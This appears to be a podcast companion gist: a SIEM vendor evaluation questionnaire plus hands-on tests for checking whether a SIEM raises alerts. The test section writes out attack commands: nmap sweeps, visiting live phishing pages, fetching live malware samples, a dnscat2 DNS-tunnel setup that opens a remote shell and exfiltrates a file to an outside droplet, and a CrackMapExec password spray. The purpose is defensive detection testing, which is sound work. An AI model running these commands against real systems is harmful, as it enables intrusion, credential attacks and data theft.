In episode 338 of the 7 Minute Security podcast, I talked about a recent engagement where I helped a customer do a bit of a SIEM solution bake-off. This gist is the companion to that episode, and is broken down into the following two sections:
Questionnaire - a series of questions you can ask SIEM vendors to gather as many data points about their products and services as possible
SIEM tests - a few tests you can conduct on your internal/external network to see if your SIEM solution indeed coughs up alerts on some things it should indeed whine about
Introduction / Purpose
CustomerX desires to implement a SIEM solution to protect endpoints within their LAN in SomeCity, SomeState and their self-hosted datacenter (provided by SomeCompany in SomeState).
This questionnaire is designed to help prime the conversation CustomerX wants to have with each vendor, so that when each vendor comes in to discuss and present their solution, CustomerX can gather the same set of criteria from each one, and make the most well-informed purchase decision possible.
It is not expected that the vendor prepare a written response to this questionnaire ahead of time (though that is an option), but it is expected that the vendor be ready to answer these questions when meeting with CustomerX.
The document is broken into several high level topics, with appropriate sub-topics and questions nested within each one.
Demo / trial period
Do you provide a demo or trial period of your product?
If yes, how long?
Any limitations during the trial period (i.e. number of alerts, functionality, etc.)?
Are there any costs associated with a trial period / demo unit?
With CustomerX's environment in mind (a network diagram will be provided), what will be the ideal sensor deployment configuration?
And what are the options for log flow (i.e. does it make sense to have one sensor per LAN, or could devices at the datacenter push their logs to a single sensor located at CustomerX's home office)?
What form can the sensors be in (physical/virtual/both)?
Traditionally, SIEMs need a lot of ongoing tuning to be effective, so how much of that will be done on the vendor side vs. CustomerX's responsibility?
Does the sensor provide any IDS/IPS functionality?
Is the sensor interface Web-based or provide console access (or both)?
Do you provide an agent or agentless configuration (or both)?
What operating systems, software and devices can you interpret logs from (include cloud services like O365, Google Apps, etc)?
Conversely, which can you not?
What would be the recommended logging configuration for CustomerX - just key servers or "everything" (including workstations)?
What are the various ways the sensors can gather network/endpoint logs and traffic?
Are there any limits to the log ingest of your solution?
Are the logs stored locally on the sensor(s), in the cloud, or both?
How long are logs kept?
What costs (if any) are generated to store logs longer than the default time?
What log searching capabilities will we have to find information from past events and alerts?
Will that searching require any additional software/hardware?
Can we cleanly export that data, if necessary, into an easy-to-read format like .CSV or .PDF?
Is the overall look/feel of your solution's interface customizable?
Is there extra cost associated to build functionality/dashboard/etc. that is not standard?
Will it be possible to create custom alerts?
Is there an extra cost associated with doing so?
Can we create custom reports?
Is there an extra cost associated with doing so?
Provide some examples of your solution being able to detect/alert/stop common threats. Examples:
Email phishing attempts
Hacker lateral movement
Provide examples of where your solution's ability to detect/alert/stop threats needs improvement?
How will this solution help improve our security posture?
How will this solution save us money?
Does your solution provide any vulnerability scanning functionality for the internal or external network?
How can your solution help me find systems that aren't currently being logged but probably should (i.e. the IT group spins up a new Windows server but forgot to tell anyone)?
Are you utilizing threat feeds to make decisions on what justifies an alert? If so are those public sources or proprietary (or both)?
Will you provide engineering resources to install the sensors?
And if so, is that an extra cost?
Is any training available so our staff can get up to speed on using this solution?
What are the associated costs, if any?
What day-to-day support options are available if we need help (phone/email/etc.)?
What do the various support options cost?
What are support hours?
Will an SLA be signed as part of this?
What compensation will we receive if SLA is not met?
Will you help us install this? Do you provide support in deploying the necessary hardware/software to get the sensors up and running?
How often do you push updates/fixes/releases - and who installs them?
What features did you add to your last major release?
What feature of your product is lacking in functionality and may require development?
Costs / licensing
How is the monthly cost of this solution calculated (number of endpoints monitored, amount of log ingest, etc.)?
What "gotchas" (if any) exist that might cause us to incur more costs?
How can you help justify your product to our board in terms of ROI?
This is a series of tests I conducted to test the effectiveness of some SIEM solutions I was evaluating for a customer. I kept a detailed log of each test done, the URLs involved, the source and destination IPs, and timestamps for everything. That way the vendor has all the info they need to go through the logs and investigate issues if necessary.
Note: before doing these tests I highly recommend you spin up a fresh Kali or Windows VM, get it fully patched and snapshot it. That way we're being extra safe in case you jack up the machine as part of these tests.
Although some SIEMs ignore nmap scans, it doesn't hurt to fire one off anyway. Drop to a Terminal and do something like:
nmap -Pn 192.168.0.0/24 -oA internal-scan
192.168.0.0/24 with your network. The
-oA will output your scan into xml, nmap and grepable nmap format (cuz' why not?) that you can have on hand if your vendor wants to look at it.
Do a similar scan to some external IPs you own - like your home router IP or AWS/DO droplets that you operate.
Head to Phish Tank and look through the recent submissions, as well as ones that have been around for a few days. Take a few that are offered in http and then fire them up and submit bogus usernames/passwords/account info/etc.
Get an account at VirusBay and download a dozen or so samples. I usually take 6 "fresh" ones, and 6 that have been around for 3+ days.
To give the SIEM a bit more of a fighting chance, I also upload these samples to a Digital Ocean droplet and re-download them over HTTP. You can do that pretty easily by SFTPing all those samples to a folder like
/icky on your droplet, then
cd to that directory and do:
python3 -m http.server
Then you can just hit
http://the-ip.of.your.droplet and grab all the samples.
To simulate DNS tunneling, you'll need both a server and a client.
I like to just use a basic Linux DO droplet for this. Grab a copy of dnscat2 and extract it to a folder like
/dnscat. Then start the server with:
ruby ./dnscat2.rb server=YOUR.DROPLET.IP.ADDRESS,port=53 --security=open
Note: whenever I set this up on a fresh Ubuntu box I forget to read the instructions which tell you to do:
git clone https://github.com/iagox86/dnscat2.git cd dnscat2/server/ gem install bundler bundle install
This always seems to fail for me, and I find that I'm missing one or more pre-requisites:
apt-get install build-essential apt-get install ruby
Additionally, once I go and fire up the dnscat server, sometimes systemd-resolved is hogging port 53 and won't let the server start, so I nuke it with this and try again:
sudo systemctl stop systemd-resolved
Again, grab dnscat2 and stick it somewhere like
Then, from that directory, create a test file or two to actually exfiltrate over DNS (the data will be just random garbage). For instance, to create a garbage file of 1mb:
dd if=/dev/zero of=1mb.txt count=1024 bs=1024
And now, on your Linux client, run this to connect to the dnscat2 server:
/dnscat --dns server=YOUR.DROPLET.IP.ADDRESS
If it's a Windows client, do:
dnscat2-exe --host YOUR.DROPLET.IP.ADDRESS
Now back on the server, you should get some message saying a shell has connected. To interact with it and download your garbage file, first connect to the new session:
session -i (plus the session number, which is probably 1)
Now drop to a shell:
Now back up so you can connect to the new shell session:
Connect to the new session:
session -i (plus the new session number, which is probably 2)
ls to validate you're receiving directory listings:
ls or dir
Back up so you can connect back to the original session:
Connect to the original session:
session -i (plus original session number, which is probably 1)
Finally, download your
download 1mb.txt /tmp/1mb.txt
Optionally, you can ensure the transfer is happening by opening a new Terminal window and watching with tcpdump:
tcpdump port 53
Note: This simple DNS test is my favorite, and in my opinion, vendors should absolutely pick up on this. I had one vendor tell me "Well, we didn't know what the DNS baseline looked like yet, so we didn't alert on it." My argument was, "I don't think that a single host should be making hundreds of thousands of DNS requests to a single IP, right?"
Load up a list of 20-30 domain users in a file called users.txt and then use CrackMapExec to password spray them using a single password. For example:
crackmapexec IP.OF.DOMAIN.CONTROLLER -u users.txt -p 'Winter2018!'